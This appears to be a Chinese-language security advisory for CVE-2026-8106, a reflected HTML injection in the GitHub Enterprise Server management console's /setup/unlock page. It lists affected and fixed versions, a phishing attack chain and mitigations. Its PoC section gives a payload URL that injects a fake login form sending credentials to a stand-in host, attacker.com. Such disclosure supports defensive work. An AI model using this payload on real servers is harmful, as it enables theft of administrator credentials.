CVE-2026-8106 GitHub Enterprise Server HTML注入漏洞

漏洞信息

漏洞编号

CVE-2026-8106

漏洞类型

HTML注入

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

GitHub Enterprise Server

漏洞概述

GitHub Enterprise Server管理控制台登录页面存在反射型HTML注入漏洞。由于/setup/unlock端点的redirect_to参数未经过滤直接反射到HTML属性中，攻击者可注入恶意表单窃取凭据。该漏洞影响3.19.1至3.19.5及3.20.0至3.20.1版本，已在3.19.6和3.20.2中修复。

技术细节

该漏洞产生于GitHub Enterprise Server管理控制台/setup/unlock端点的输入验证缺失机制。具体来说，服务器在处理HTTP请求时，直接获取redirect_to查询参数的值，并将其未经安全过滤地嵌入到响应页面的HTML标签属性中。这种反射型HTML注入允许攻击者通过精心构造的Payload（如双引号闭合标签后添加恶意事件或标签）来改变页面DOM结构。利用此漏洞，攻击者可以创建一个与真实登录界面高度相似的伪造表单。攻击流程中，攻击者首先生成包含恶意Payload的URL，通过社会工程学手段诱导管理员点击。由于该端点涉及管理控制台解锁，管理员极有可能在受影响的页面上输入敏感凭据。一旦输入，凭据将被捕获并外传，从而导致服务器权限被窃取。

攻击链分析

STEP 1

步骤1：准备

攻击者识别目标GitHub Enterprise Server实例，并构造包含恶意HTML注入代码的特制URL，利用redirect_to参数携带Payload。

STEP 2

步骤2：传递

攻击者通过网络钓鱼或其他社会工程学手段，将特制链接发送给拥有管理员权限的目标用户。

STEP 3

步骤3：利用

管理员点击链接，服务器加载/setup/unlock页面并将未经过滤的redirect_to参数反射回HTML响应中，导致恶意表单代码在浏览器中渲染。

STEP 4

步骤4：窃取

管理员在受影响的页面上看到伪造的登录框并输入凭据。表单被提交至攻击者控制的服务器，导致管理员凭证泄露。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- Proof of Concept for CVE-2026-8106 -->
<!-- Target Endpoint: /setup/unlock -->
<!-- Vulnerable Parameter: redirect_to -->

<!-- Attack Scenario: Injecting a form to steal credentials -->
<!-- The payload breaks out of the HTML attribute and injects a new form -->

<!-- Example URL -->
<!-- https://[TARGET-IP]/setup/unlock?redirect_to="><form action=http://attacker.com/steal method=POST><input name=user><input name=pass><input type=submit></form> -->

<!-- HTML Injection Payload Explanation -->
<!-- 1. "> closes the existing attribute and the HTML tag -->
<!-- 2. <form...> injects a malicious form that sends data to an external server -->
<!-- 3. When the victim types their credentials, they are sent to the attacker -->

影响范围

GitHub Enterprise Server 3.19.1 - 3.19.5

GitHub Enterprise Server 3.20.0 - 3.20.1

防御指南

临时缓解措施

如果无法立即升级，应限制管理控制台（/setup）的网络访问权限，仅允许受信任的IP地址访问。同时，加强对管理员的安全意识培训，警惕来源不明的链接，避免在非官方确认的登录页面输入凭据。